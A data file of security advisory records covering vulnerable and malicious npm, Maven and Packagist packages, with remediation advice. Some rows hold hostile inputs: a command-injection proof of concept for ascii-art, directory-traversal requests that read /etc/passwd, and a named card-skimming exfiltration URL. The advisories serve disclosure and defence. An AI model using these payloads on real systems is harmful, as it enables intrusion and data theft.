+1.4.0,GHSA-v35c-49j6-q8hq,2021-10-04T21:19:09Z,2020-09-15T20:30:34Z,,['CVE-2016-9879'],Security Constraint Bypass in Spring Security,"Spring Security does not consider URL path parameters when processing security constraints. By adding a URL path parameter with an encoded ""/"" to a request, an attacker may be able to bypass a security constraint. The root cause of this issue is a lack of clarity regarding the handling of path parameters in the Servlet Specification (see below). Some Servlet containers include path parameters in the value returned for getPathInfo() and some do not. Spring Security uses the value returned by getPathInfo() as part of the process of mapping requests to security constraints. The unexpected presence of path parameters can cause a constraint to be bypassed.
+
+Users of Apache Tomcat (all current versions) are not affected by this vulnerability since Tomcat follows the guidance previously provided by the Servlet Expert group and strips path parameters from the value returned by getContextPath(), getServletPath() and getPathInfo() [1].
+
+Users of other Servlet containers based on Apache Tomcat may or may not be affected depending on whether or not the handling of path parameters has been modified.
+
+Users of IBM WebSphere Application Server 8.5.x are known to be affected.
+
+Users of other containers that implement the Servlet specification may be affected.
+
+[1] https://issues.apache.org/bugzilla/show_bug.cgi?id=25015
+
+## Affected Pivotal Products and Versions
+Severity is high unless otherwise noted.
+- Spring Security 3.2.0 - 3.2.9
+- Spring Security 4.0.x - 4.1.3
+- Spring Security 4.2.0
+- Older unsupported versions are also affected
+
+## Mitigation
+Adopting one of the following mitigations will protect against this vulnerability.
+
+- Use a Servlet container known not to include path parameters in the return values for getServletPath() and getPathInfo()
+- Upgrading to Spring Security 3.2.10, 4.1.4 or 4.2.1 will reject the request with a RequestRejectedException if the presence of an encoded ""/"" is detected. Note: If you wish to disable this feature it can be disabled by setting the DefaultHttpFirewall.allowUrlEncodedSlash = true. However, disabling this feature will mean applications are vulnerable (in containers that return path parameters in getServletPath() or getPathInfo()).
+
+## Credit
+The issue was identified by Shumpei Asahara & Yuji Ito from NTT DATA Corporation and responsibly reported to Pivotal.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-9879'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2017:1832'}, {'type': 'WEB', 'url': 'https://pivotal.io/security/cve-2016-9879'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/95142'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-15T20:29:50Z', 'nvd_published_at': '2017-01-06T22:59:00Z'}"
+1.4.0,GHSA-65j7-66p7-9xgf,2021-09-30T21:59:50Z,2020-09-02T21:51:55Z,,[],Malicious Package in font-scrubber,"Version 1.2.2 of `font-scrubber` contains malicious code as a postinstall script. The package attempts to upload sensitive files from the system to a remote server. The files include configuration files, command history logs, SSH keys and /etc/passwd.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'font-scrubber'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/919'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v8g7-9qv2-j865,2021-10-01T20:42:19Z,2020-09-04T16:38:55Z,,[],Malicious Package in bitcoin-osp,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bitcoin-osp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1365'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rjhc-w3fj-j6x9,2021-09-30T18:35:42Z,2020-09-03T17:32:45Z,,[],Malicious Package in alipayjsapi,"All versions of `alipayjsapi` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'alipayjsapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1048'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9hqj-38j2-5jgm,2020-08-31T18:33:35Z,2020-09-01T21:19:23Z,,[],Command Injection in ascii-art,"Versions of `ascii-art` before 1.4.4 are vulnerable to command injection. This is exploitable when user input is passed into the argument of the `ascii-art preview` command.
+
+
+Example Proof of concept:
+`ascii-art preview 'doom""; touch /tmp/malicious; echo ""'`
+
+Given that the input is passed on the command line and none of the api methods are vulnerable to this, the likely exploitation vector is when the ascii-art comment is being called programmatically using something like `execFile`.
+
+
+## Recommendation
+
+Update to version 1.4.4 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'ascii-art'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.2'}}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/390631'}, {'type': 'WEB', 'url': 'https://github.com/nodejs/security-wg/blob/master/vuln/npm/471.json'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/727'}]","{'cwe_ids': ['CWE-77'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:33:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hrpp-f84w-xhfg,2021-10-04T19:13:23Z,2020-09-04T16:55:06Z,,[],Outdated Static Dependency in vue-moment,"Versions of `vue-moment` prior to 4.1.0 contain an Outdated Static Dependency. The package depends on `moment` and has it loaded statically instead of as a dependency that can be updated. It has `moment@2.19.1` that contains a Regular Expression Denial of Service vulnerability.
+
+
+## Recommendation
+
+Upgrade to version 4.1.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'vue-moment'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/brockpetrie/vue-moment/commit/a265e54660a7181a6795a12a97cebac5b305746e'}, {'type': 'PACKAGE', 'url': 'https://github.com/brockpetrie/vue-moment'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-VUEMOMENT-538934'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1425'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/532'}]","{'cwe_ids': ['CWE-1104'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mfcp-34xw-p57x,2021-09-29T20:12:42Z,2020-09-03T21:20:52Z,,[],Authentication Bypass in saml2-js,"Versions of `saml2-js` prior to 2.0.5 are vulnerable to an Authentication Bypass. The package fails to enforce the assertion conditions for encrypted assertions, which may allow an attacker to reuse encrypted assertion tokens indefinitely.
+
+
+## Recommendation
+
+Upgrade to version 2.0.5 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'saml2-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Clever/saml2/pull/190'}, {'type': 'WEB', 'url': 'https://github.com/Clever/saml2/commit/ae0da4d0a0ea682a737be481e3bd78798be405c0'}, {'type': 'PACKAGE', 'url': 'https://github.com/Clever/saml2'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SAML2JS-474637'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1222'}]","{'cwe_ids': ['CWE-287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jchg-g94r-64qg,2021-09-30T20:20:03Z,2020-09-03T19:50:10Z,,[],Malicious Package in mogobd,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'mogobd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1132'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rwcq-qpm6-7867,2021-10-01T21:04:25Z,2020-09-03T17:04:32Z,,[],Malicious Package in riped160,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'riped160'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1403'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fwcw-5qw2-87mp,2022-08-03T21:39:33Z,2020-09-01T15:55:56Z,,['CVE-2016-1000235'],fuelux vulnerable to Cross-Site Scripting in Pillbox feature,"Affected versions of `fuelux` contain a cross-site scripting vulnerability in the Pillbox feature. By supplying a script as a value for a new pillbox, it is possible to cause arbitrary script execution.
+
+## Recommendation
+
+Update to version 3.15.7 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'fuelux'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.15.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000235'}, {'type': 'WEB', 'url': 'https://github.com/ExactTarget/fuelux/issues/1841'}, {'type': 'WEB', 'url': 'https://github.com/ExactTarget/fuelux/pull/1856'}, {'type': 'PACKAGE', 'url': 'https://github.com/ExactTarget/fuelux'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/133'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:11:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q4cq-539c-3mmm,2023-09-12T19:35:27Z,2020-09-01T16:48:14Z,,['CVE-2017-16103'],Directory Traversal in serveryztyzt,"Affected versions of `serveryztyzt` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'serveryztyzt'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16103'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/serveryztyzt'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/354'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:20:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8fv7-vm2p-5495,2023-09-11T16:37:05Z,2020-09-01T17:23:53Z,,['CVE-2017-16123'],Directory Traversal in welcomyzt,"`welcomyzt` is a simple file server.
+
+`welcomyzt` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing `../` in the url.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host: localhost
+```
+ and server Response:
+```http
+HTTP/1.1 200 OK
+Date: Thu, 04 May 2017 23:59:18 GMT
+Connection: keep-alive
+Transfer-Encoding: chunked
+
+{contents of /etc/passwd}
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'welcomyzt'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16123'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/pooledwebsocket'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/388'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:21:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9px9-f7jw-fwhj,2020-08-31T19:01:15Z,2020-09-03T15:49:37Z,,[],Command Injection in priest-runner,"All versions of `priest-runner` are vulnerable to Command Injection. The package fails to sanitize input and passes it directly to a `spawn` call, which may allow attackers to execute arbitrary code in the system. The `PriestController.prototype.createChild ` function is vulnerable since the `spawn` parameters come from a POST request body.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'priest-runner'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1492'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gjc9-932x-c59p,2023-07-25T20:40:16Z,2020-09-03T00:34:33Z,,[],Malicious Package in leaflet-gpx,"Version 1.0.1 of `leaflet-gpx` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
+
+Users may consider a downgrade to version 1.0.0",[],"[{'package': {'ecosystem': 'npm', 'name': 'leaflet-gpx'}, 'versions': ['1.0.1']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/937'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qvc5-cfrr-384v,2020-09-23T15:01:47Z,2020-09-23T17:20:28Z,,[],RCE in Third Party Library in Shopware,"### Impact
+RCE in Third Party Library
+
+### Patches
+We recommend to update to the current version 6.3.1.1. You can get the update to 6.3.1.1 regularly via the Auto-Updater or directly via the download overview.
+
+For older versions you can use the Security Plugin:
+https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
+
+### References
+https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-09-2020",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.1.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-qvc5-cfrr-384v'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-09-2020'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-09-23T15:01:47Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hx5x-49mm-vmhw,2021-09-27T22:39:39Z,2020-09-03T02:36:43Z,,[],SQL Injection in sails-mysql,"Versions of `sails-mysql` prior to 0.10.8 are vulnerable to SQL Injection. The `sort` keyword is not properly sanitized and may allow attackers to inject SQL statements and execute arbitrary SQL queries
+
+
+## Recommendation
+
+Upgrade to version 0.10.8 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'sails-mysql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/balderdashy/sails/issues/6679'}, {'type': 'PACKAGE', 'url': 'https://github.com/balderdashy/sails'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SAILSMYSQL-174916'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/950'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2hqf-qqmq-pgpp,2021-10-01T13:30:38Z,2020-09-02T15:48:16Z,,[],Malicious Package in commander-js,"All versions of `commander-js` are considered malicious. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads an arbitrary file and executes its contents as a post-install script.
+
+
+## Recommendation
+
+This package is not available on the npm Registry anymore. If you happen to find this package in your environment you should consider the system it was installed on compromised and assess if further response (such as rotating all credentials found on the compromised machine) is necessary.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'commander-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/763'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wch2-46wj-6x5j,2021-10-01T20:38:52Z,2020-09-04T15:37:15Z,,[],Malicious Package in bip30,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bip30'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1358'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-49c6-3wr4-8jr4,2021-10-01T20:07:48Z,2020-09-04T15:05:26Z,,[],Malicious Package in malicious-npm-package,"All versions of `malicious-npm-package` contain malicious code. The malware targets Windows systems. It runs a powershell command that downloads an executable file from a remote server and runs it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'malicious-npm-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1323'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mg69-6j3m-jvgw,2021-10-04T20:55:27Z,2020-09-03T15:45:08Z,,[],HTML Injection in marky-markdown,"All versions of `marky-markdown` are vulnerable to HTML Injection. The package fails to sanitize `style` attributes in `img` tags of the markdown input. This may allow attackers to affect the size of images in the rendered HTML.
+
+
+## Recommendation
+
+This package is no longer maintained. Please upgrade to `@npmcorp/marky-markdown`","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'marky-markdown'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'PACKAGE', 'url': 'https://github.com/npm/marky-markdown'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MARKYMARKDOWN-548871'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1470'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5wq6-v5cw-jvfr,2021-09-30T17:12:55Z,2020-09-03T23:03:36Z,,[],Malicious Package in js-shas,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-shas'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1285'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8549-p68h-m9mc,2021-09-29T20:57:14Z,2020-09-03T21:46:21Z,,[],Malicious Package in buffdr-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffdr-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1237'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h6m3-cx24-9626,2021-10-01T14:15:57Z,2020-09-03T23:11:45Z,,[],Malicious Package in js-sla3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-sla3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1292'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pm9v-325f-5g74,2021-09-30T21:26:49Z,2020-09-02T21:30:11Z,,[],Malicious Package in saync,"All versions of `saync ` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'saync'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/896'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5w4r-wwc3-6qcp,2023-07-27T20:33:34Z,2020-09-11T21:23:29Z,,[],Malicious Package in precode.js,"Version 1.1.1 of `precode.js` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.1.0",[],"[{'package': {'ecosystem': 'npm', 'name': 'precode.js'}, 'versions': ['1.1.1']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/941'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4r97-78gf-q24v,2020-08-31T19:00:12Z,2020-09-04T17:53:27Z,,[],Prototype Pollution in klona,"Versions of `klona` prior to 1.1.1 are vulnerable to prototype pollution. The package does not restrict the modification of an Object's prototype when cloning objects, which may allow an attacker to add or modify an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+Upgrade to version 1.1.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'klona'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/778414'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1463'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:12Z', 'nvd_published_at': None}"
